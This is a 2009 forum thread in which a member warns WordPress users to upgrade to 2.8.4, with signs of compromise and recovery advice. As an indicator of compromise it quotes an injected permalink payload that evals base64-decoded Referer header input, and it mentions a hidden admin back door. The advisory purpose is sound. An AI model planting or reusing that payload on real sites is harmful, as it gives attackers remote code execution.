Our website is made possible by displaying online advertisements to our visitors.
Please consider supporting us by disabling your ad blocker.
Results 1 to 2 of 2

Thread: Wordpress Users - Upgrade Immediately

  1. 07-09-2009, 02:05 PM #1
    Marc J
    Marc J is offline
    Web Guru Marc J's Avatar
    Join Date
    Feb 2007
    Location
    Edinburgh
    Posts
    3,340

    Exclamation Wordpress Users - Upgrade Immediately

    If you are using Wordpress you must make sure you upgrade it to 2.8.4 IMMEDIATELY or remove it from your site entirely. Details on how to upgrade are located here: http://codex.wordpress.org/Upgrading_WordPress

    Last night a number of people on Twitter and blogs mentioned that their Wordpress sites were acting up. Specifically that permalinks were broken and showing up with weird code.

    There are two clues that your WordPress site has been attacked:
    1) There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFER ER%5D))%7D%7D|.+)&%/. The keywords are "eval" and "base64_decode" (Check your permalinks in Admin > Settings > Permalinks).

    2) A "back door" was created by a "hidden" Administrator. Check your site users for "Administrator (2)" or a name you do not recognize. You will probably be unable to access that account.

    Wordpress has identified that there are hackers out there, hacking sites that aren't using the most-current version of Wordpress (versions below 2.8.4 as of 05/09/2009 -- there are rumours that 2.8.5 is due to be released imminently so keep an eye out for that too).

    If you have not yet been hacked, UPGRADE NOW! Immediately. Stop reading this, really, and go upgrade. Again, details on how to upgrade are located here: http://codex.wordpress.org/Upgrading_WordPress

    If you have been hacked, sorry, you're going to be busy! Upgrading alone will not fix a hacked site. Mashable.com's alert said: "You'll likely need to export your all your content with the built-in XML WordPress export, uninstall and reinstall WordPress and re-import the content. It's a nasty attack that goes all the way into the database, so exporting the database will result in exporting the hacked code too."

    Not sure how to do that? It's not that difficult, but it is very time-consuming.

    I cannot stress how important it is to get your Wordpress installation up-to-date. Remember: If your scripts are out-of-date then your site is insecure and could be hacked at any moment.
    Reply With Quote Reply With Quote
  2. 07-09-2009, 02:14 PM #2
    Tom
    Tom is offline
    Tom's Avatar
    Join Date
    Aug 2007
    Location
    Kent, Medway
    Posts
    6,722

    Default

    Thanks for the heads up Marc.

    Expect a pm soon. . Just got the email.
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules